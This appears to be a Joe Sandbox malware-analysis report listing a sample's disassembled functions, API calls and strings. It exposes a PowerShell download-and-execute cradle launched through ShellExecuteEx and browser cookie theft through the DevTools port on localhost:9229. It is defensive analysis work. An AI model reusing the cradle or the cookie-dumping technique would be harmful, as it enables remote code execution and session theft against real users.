                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAD5C
                                    • lstrcat.KERNEL32(00000000,000D4AD4), ref: 000BAD68
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAD91
                                    • lstrlen.KERNEL32(00E6DD38), ref: 000BADA7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BADCF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000BADDA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAE03
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BAE3F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000BAE49
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAE6F
                                    • lstrlen.KERNEL32(00000000), ref: 000BAE85
                                    • lstrcpy.KERNEL32(00000000,00E6DC48), ref: 000BAEB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen
                                    • String ID: f
                                    • API String ID: 2762123234-1993550816
                                    • Opcode ID: 63e19a6b292f0b91df8cc3b10325aad5b75295b8f38a12f4670131cd12355217
                                    • Instruction ID: e77e1b6e175e40bce8af42a7c0dbab8f0de14bc860f43726dd926991d2ff7b7b
                                    • Opcode Fuzzy Hash: 63e19a6b292f0b91df8cc3b10325aad5b75295b8f38a12f4670131cd12355217
                                    • Instruction Fuzzy Hash: 65B18F30A11616DFCB22EFA8DC49AEFB7B5AF12701F040435B81597A62EB30DD41CB92
                                    Function 000C1820 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 269stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C184F
                                    • lstrlen.KERNEL32(00E56198), ref: 000C1860
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1887
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1892
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C18C1
                                    • lstrlen.KERNEL32(000D4FA0), ref: 000C18D3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C18F4
                                    • lstrcat.KERNEL32(00000000,000D4FA0), ref: 000C1900
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C192F
                                    • lstrlen.KERNEL32(00E55FE8), ref: 000C1945
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C196C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1977
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C19A6
                                    • lstrlen.KERNEL32(000D4FA0), ref: 000C19B8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C19D9
                                    • lstrcat.KERNEL32(00000000,000D4FA0), ref: 000C19E5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1A14
                                    • lstrlen.KERNEL32(00E561A8), ref: 000C1A2A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1A51
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1A5C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1A8B
                                    • lstrlen.KERNEL32(00E55FD8), ref: 000C1AA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1AC8
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1AD3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1B02
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen
                                    • String ID: _
                                    • API String ID: 1049500425-2350027178
                                    • Opcode ID: 515f67ebe03ef73db55ae3480735457f0498a811d2a9379a779e7abbdc317e27
                                    • Instruction ID: 7768fc694732dc6503f4c9d6d95500c7c07a99194b451fd9430a4a65af2f074c
                                    • Opcode Fuzzy Hash: 515f67ebe03ef73db55ae3480735457f0498a811d2a9379a779e7abbdc317e27
                                    • Instruction Fuzzy Hash: DF91FD71A01703AFDB60AFB9EC88E9A77E9EF16301B14443DB896C7662DB34DC458B50
                                    Function 000C47E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(ws2_32.dll,?,000B72A4), ref: 000C47E6
                                    • GetProcAddress.KERNEL32(00000000,connect), ref: 000C47FC
                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 000C480D
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000C481E
                                    • GetProcAddress.KERNEL32(00000000,htons), ref: 000C482F
                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 000C4840
                                    • GetProcAddress.KERNEL32(00000000,recv), ref: 000C4851
                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 000C4862
                                    • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 000C4873
                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 000C4884
                                    • GetProcAddress.KERNEL32(00000000,send), ref: 000C4895
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                    • API String ID: 2238633743-3087812094
                                    • Opcode ID: 10a0f047457ffcb73d21f0faae2bfe874b84148be0761f120b97940ad5ec591f
                                    • Instruction ID: bee95948a80be520c2074c10fea36211083b7cc6d420d11560934c08e3f2377f
                                    • Opcode Fuzzy Hash: 10a0f047457ffcb73d21f0faae2bfe874b84148be0761f120b97940ad5ec591f
                                    • Instruction Fuzzy Hash: 0A114576D93721BB87119FB5BC0DB5A3BB8BB09707304491BFA51EA260DAF44840DF60
                                    Function 000BBE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BBE53
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BBE86
                                    • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 000BBE91
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BBEB1
                                    • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 000BBEBD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BBEE0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000BBEEB
                                    • lstrlen.KERNEL32(')"), ref: 000BBEF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BBF13
                                    • lstrcat.KERNEL32(00000000,')"), ref: 000BBF1F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BBF46
                                    • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 000BBF66
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BBF88
                                    • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 000BBF94
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BBFBA
                                    • ShellExecuteEx.SHELL32(?), ref: 000BC00C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 4016326548-898575020
                                    • Opcode ID: 9c3ffdf992a28864c3f9f4a29c25af48e92495c8be34edc6c43ac067ca4c37d4
                                    • Instruction ID: e1626179a819a69dd976c1709b0997006ea96603c610cf4cab3d0ff618d48d34
                                    • Opcode Fuzzy Hash: 9c3ffdf992a28864c3f9f4a29c25af48e92495c8be34edc6c43ac067ca4c37d4
                                    • Instruction Fuzzy Hash: EE618131E11216ABDB21AFB9DC89AEF7BE9AF15700F04043AF509D7262DB74CD418B91
                                    Function 000B4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4793
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000B47C5
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B4812
                                    • lstrlen.KERNEL32(000D4B60), ref: 000B481D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B483A
                                    • lstrcat.KERNEL32(00000000,000D4B60), ref: 000B4846
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B486B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4898
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B48A3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B48CA
                                    • StrStrA.SHLWAPI(?,00000000), ref: 000B48DC
                                    • lstrlen.KERNEL32(?), ref: 000B48F0
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B4931
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B49B8
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B49E1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4A0A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4A30
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4A5D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 4107348322-3310892237
                                    • Opcode ID: 85b0e20f27cb81bba132d1d9052f7ae7aa8969d41a5127437779337ac45b7ffb
                                    • Instruction ID: 85a3d2e4827ba140c22ee6ace9770ee893e4d796a5949eb7738ee64a0f972757
                                    • Opcode Fuzzy Hash: 85b0e20f27cb81bba132d1d9052f7ae7aa8969d41a5127437779337ac45b7ffb
                                    • Instruction Fuzzy Hash: 4AB19431A112169BCB21EFB8E8899EF77F5AF55700F044539F845AB613DB30ED058B91
                                    Function 000A92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000A90C0: InternetOpenA.WININET(000CCFEC,00000001,00000000,00000000,00000000), ref: 000A90DF
                                      • Part of subcall function 000A90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 000A90FC
                                      • Part of subcall function 000A90C0: InternetCloseHandle.WININET(00000000), ref: 000A9109
                                    • strlen.MSVCRT ref: 000A92E1
                                    • strlen.MSVCRT ref: 000A92FA
                                      • Part of subcall function 000A8980: std::_Xinvalid_argument.LIBCPMT ref: 000A8996
                                    • strlen.MSVCRT ref: 000A9399
                                    • strlen.MSVCRT ref: 000A93E6
                                    • lstrcat.KERNEL32(?,cookies), ref: 000A9547
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000A9559
                                    • lstrcat.KERNEL32(?,?), ref: 000A956A
                                    • lstrcat.KERNEL32(?,000D4B98), ref: 000A957C
                                    • lstrcat.KERNEL32(?,?), ref: 000A958D
                                    • lstrcat.KERNEL32(?,.txt), ref: 000A959F
                                    • lstrlen.KERNEL32(?), ref: 000A95B6
                                    • lstrlen.KERNEL32(?), ref: 000A95DB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A9614
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 1201316467-3542011879
                                    • Opcode ID: 2927ea7a6e20cea3b8b8b3c50e2607d4bb220dd5957df3e275da6a24ee82d437
                                    • Instruction ID: 9e2be29e1e8b94313afac6d43c1395a0f4a7962955949fa1999b61455d04d2e0
                                    • Opcode Fuzzy Hash: 2927ea7a6e20cea3b8b8b3c50e2607d4bb220dd5957df3e275da6a24ee82d437
                                    • Instruction Fuzzy Hash: FDE11571E10218EFDF10DFE8D885ADEBBB5AF59300F1044AAE509A7251EB349E45CF91
                                    Function 000BD980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 000BD9A1
                                    • memset.MSVCRT ref: 000BD9B3
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BD9DB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BDA0E
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BDA1C
                                    • lstrcat.KERNEL32(?,00E6E098), ref: 000BDA36
                                    • lstrcat.KERNEL32(?,?), ref: 000BDA4A
                                    • lstrcat.KERNEL32(?,00E6CDE8), ref: 000BDA5E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BDA8E
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000BDA95
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BDAFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 2367105040-0
                                    • Opcode ID: 906917cc3deadac2aef7788f45885ebdb36ef21ebca0ce134e929ad36e9464c9
                                    • Instruction ID: fe57103522a5efd39d578cb3dff3b01d81bdd5911e4c2dc2476d549dc3c1dbc1
                                    • Opcode Fuzzy Hash: 906917cc3deadac2aef7788f45885ebdb36ef21ebca0ce134e929ad36e9464c9
                                    • Instruction Fuzzy Hash: 5CB19271D10219AFDB10EFA4DC889EEB7B9BF48300F14456AF909E7251EB309E45CB51
                                    Function 000AB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AB330
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB37E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB3A9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000AB3B1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB3D9
                                    • lstrlen.KERNEL32(000D4C50), ref: 000AB450
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB474
                                    • lstrcat.KERNEL32(00000000,000D4C50), ref: 000AB480
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB4A9
                                    • lstrlen.KERNEL32(00000000), ref: 000AB52D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB557
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000AB55F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB587
                                    • lstrlen.KERNEL32(000D4AD4), ref: 000AB5FE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB622
                                    • lstrcat.KERNEL32(00000000,000D4AD4), ref: 000AB62E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB65E
                                    • lstrlen.KERNEL32(?), ref: 000AB767
                                    • lstrlen.KERNEL32(?), ref: 000AB776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AB79E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
